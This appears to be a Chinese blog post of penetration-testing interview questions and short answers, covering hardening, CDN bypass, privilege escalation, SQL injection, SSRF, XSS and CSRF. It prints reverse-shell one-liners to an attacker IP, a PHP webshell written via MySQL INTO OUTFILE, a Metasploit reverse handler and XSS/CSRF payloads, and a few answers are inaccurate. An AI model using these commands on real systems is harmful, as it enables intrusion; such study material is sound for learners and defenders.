2025年渗透测试面试题总结-拷打题库09(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年渗透测试面试题总结-拷打题库09
1. Linux系统加固降权思路
2. 系统后门检测工具
3. 绕过CDN获取真实IP
4. 给定网站的渗透思路
5. Windows与Linux提权思路
6. 开源组件高危漏洞(10+)
7. 反弹Shell命令及选择
8. CMD查询远程开放端口
9. IIS+PHP+MySQL渗透思路
10. 查询MySQL表列名
11. SQL头注入点
12. PHP命令执行函数
13. SSRF漏洞防御与绕过
14. MySQL写Shell方法
15. Metasploit反向监听命令
16. 应急响应步骤
17. 反向代理工具
18. 同源策略(SOP)
19. XSS的用途
20. XSS类型与防御
21. 存储型XSS原理
22. 快速发现XSS位置
23. DOM型XSS与反射型区别
24. 清空Referer的方法
25. Cookie的Security属性
26. XSS漏洞快速定位
27. XSS/CSRF/CRLF区别
28. CSRF不带Referer访问
2025年渗透测试面试题总结-拷打题库09
Windows、Linux、数据库的加固降权思路,任选其一 你使用什么工具来判断系统是否存在后门 如何绕过CDN获取目标网站真实IP,谈谈你的思路? 如果给你一个网站 谈一谈Windows系统与Linux系统提权的思路? 列举出您所知道的所有开源组件高危漏洞(十个以上) 反弹shell的常用命令?一般常反弹哪一种shell?为什么? CMD命令行如何查询远程终端开放端口 服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路 请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句 SQL头注入点 php中命令执行涉及到的函数 SSRF漏洞的成因防御绕过 mysql写shell有几种方法 Metasploit打开反向监听的命令 应急响应的步骤 有哪些反向代理的工具? 什么是同源策略? XSS能用来做什么? XSS的三种类型,防御方法 存储型xss原理? 你怎么理解xss攻击? 如何快速发现xss位置? Domxss原理/防范 DOM型XSS与反射型XSS区别? 如何使得前端referer为空 cookie参数,security干什么的 如果SRC上报了一个XSS漏洞,payload已经写入页面,但未给出具体位置,如何快速介入? XSS,CSRF,CRLF比较容易弄混,说说三者的原理,防御方法 csrf如何不带referer访问
1. Linux系统加固降权思路
核心措施:
- 最小化权限:
- 使用
chmod 750
限制敏感目录权限(如/etc
)。- 通过
visudo
限制用户sudo
权限。- 禁用高危服务:
- 关闭不必要的服务:
systemctl disable telnet
。- 禁用Root远程登录:修改
/etc/ssh/sshd_config
中PermitRootLogin no
。- 日志监控:
- 配置
auditd
监控敏感操作(如文件修改、用户提权)。
2. 系统后门检测工具
常用工具:
- Rootkit检测:
rkhunter --check
(扫描隐藏文件、异常进程)。chkrootkit
(检测已知Rootkit特征)。- 网络分析:
netstat -antp
(检查异常连接)。lsof -i :可疑端口
(定位进程)。
3. 绕过CDN获取真实IP
技术手段:
- 历史DNS记录:
- 使用
SecurityTrails
查询目标域名历史解析记录。- 子域名探测:
- 通过
subfinder
扫描子域名(部分子域名可能未配置CDN)。- SSL证书匹配:
- 在
Censys
中搜索相同证书的IP地址。- 邮件服务器溯源:
- 分析邮件头中
Received
字段获取服务器IP。
4. 给定网站的渗透思路
步骤:
- 信息收集:
- Whois查询、目录扫描(
dirsearch -u http://target
)。- 漏洞探测:
- SQL注入:
sqlmap -u "http://target/?id=1"
。- 文件上传:测试绕过
.htaccess
限制。- 权限提升:
- 利用内核漏洞(
dirtycow
)或配置错误(SUID)。
5. Windows与Linux提权思路
Windows提权:
- 服务路径滥用:
sc config VulnService binPath= "C:\shell.exe"
。- 令牌窃取:利用
incognito
模仿SYSTEM令牌。Linux提权:
- SUID提权:
find / -perm -4000 2>/dev/null
。- 内核漏洞:利用
CVE-2021-4034
(Polkit提权)。
6. 开源组件高危漏洞(10+)
组件/漏洞 CVE/影响 Log4j2 CVE-2021-44228(RCE) Apache Struts2 S2-045(远程代码执行) Spring Cloud CVE-2022-22963(SpEL注入) Fastjson 反序列化RCE(1.2.24及以下) Drupal CVE-2018-7600(Drupalgeddon2) ThinkPHP 多版本RCE(如5.x路由注入) Elasticsearch CVE-2015-1427(Groovy脚本执行) OpenSSL Heartbleed(CVE-2014-0160) Jenkins CVE-2018-1000861(RCE) Nginx CVE-2013-2028(栈溢出)
7. 反弹Shell命令及选择
常用命令:
- Bash:
bash -i >& /dev/tcp/攻击IP/端口 0>&1
(兼容性强)。- Netcat:
nc -e /bin/sh 攻击IP 端口
。- Python:
python
import socket,os,pty;s=socket.socket();s.connect((" 攻击IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
首选原因:Bash广泛支持且无需额外依赖。
8. CMD查询远程开放端口
命令:
cmd
netstat -ano | findstr "ESTABLISHED" # 查看已连接端口 telnet 目标IP 端口 # 手动测试端口连通性
9. IIS+PHP+MySQL渗透思路
- 利用SQL注入:
- 通过
UNION SELECT
写入WebShell:SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE 'C:/inetpub/wwwroot/shell.php'
。- UDF提权:
- 上传恶意DLL并创建函数执行系统命令。
- 横向移动:
- 利用数据库凭证尝试登录其他服务(如SSH、远程桌面)。
10. 查询MySQL表列名
语句:
sql
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='helloworld' AND TABLE_NAME='users';
11. SQL头注入点
常见注入位置:
- HTTP头字段:
User-Agent
、X-Forwarded-For
、Cookie
。
示例:http
GET / HTTP/1.1 User-Agent: ' UNION SELECT 1,2,3 --
12. PHP命令执行函数
高危函数:
system("whoami")
exec("cat /etc/passwd")
shell_exec("id")
passthru("ls")
13. SSRF漏洞防御与绕过
维度 内容 成因 未校验用户输入的URL参数 防御 限制协议(仅HTTP/HTTPS)、禁用重定向 绕过 使用 http://127.0.0.1@evil.com
或IPv6
14. MySQL写Shell方法
- INTO OUTFILE:需
FILE
权限和可写路径。- 日志文件:
sql
SET GLOBAL general_log_file='/var/www/shell.php'; SET GLOBAL general_log=ON;
15. Metasploit反向监听命令
bash
msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击IP set LPORT 端口 run
16. 应急响应步骤
- 隔离网络:断开受感染主机网络。
- 取证分析:使用
Volatility
分析内存镜像。- 清除后门:删除恶意文件并修复漏洞。
- 恢复监控:部署HIDS(如Osquery)。
17. 反向代理工具
- Nginx:高性能,支持负载均衡。
- Apache:模块化设计,兼容性强。
- HAProxy:专用于TCP/HTTP流量分发。
18. 同源策略(SOP)
定义:浏览器限制脚本仅访问同协议、域名、端口的资源。
示例:https://a.com
无法读取https://b.com
的Cookie。
19. XSS的用途
- 窃取Cookie:
document.cookie
发送至攻击者服务器。- 钓鱼攻击:伪造登录框诱导用户输入凭证。
- 会话劫持:通过JavaScript操作用户会话。
20. XSS类型与防御
类型 防御方法 存储型 输入过滤(如 htmlspecialchars
)反射型 输出编码 + 设置 HttpOnly
CookieDOM型 避免 eval()
,使用textContent
替代
21. 存储型XSS原理
流程:用户输入恶意脚本 → 存储至数据库 → 其他用户加载页面时执行。
示例:留言板插入<script>alert(1)</script>
。
22. 快速发现XSS位置
- 输入点测试:
- 表单、URL参数、HTTP头(如
Referer
)。- 自动化扫描:
- 使用
XSStrike
或Burp Suite
扫描反射点。
23. DOM型XSS与反射型区别
- DOM型:漏洞在客户端解析阶段触发,无需服务器参与。
- 反射型:恶意脚本经服务器返回后执行。
24. 清空Referer的方法
- HTML标签:
html
<meta name="referrer" content="no-referrer">
- JavaScript:
javascript
window.location.href = 'http://target?data=xxx';
25. Cookie的Security属性
作用:仅通过HTTPS传输Cookie,防止中间人窃取。
设置:Set-Cookie: session=123; Secure
。
26. XSS漏洞快速定位
- 代码审计:搜索
innerHTML
、document.write
等高风险函数。- 输入模糊测试:插入
<img src=x onerror=alert(1)>
观察是否弹窗。
27. XSS/CSRF/CRLF区别
漏洞 原理 防御方法 XSS 恶意脚本在用户浏览器执行 输入编码 + CSP策略 CSRF 伪造用户身份发起请求 Token校验 + SameSite Cookie CRLF 注入换行符控制HTTP头/日志 过滤 \r\n
+ 严格校验输入
28. CSRF不带Referer访问
绕过方法:
- 使用
<meta>
标签跳转:html
<meta http-equiv="refresh" content="0; url=http://bank.com/transfer?to=attacker">
- HTTPS页面发起请求:部分浏览器允许HTTPS页面不发送Referer。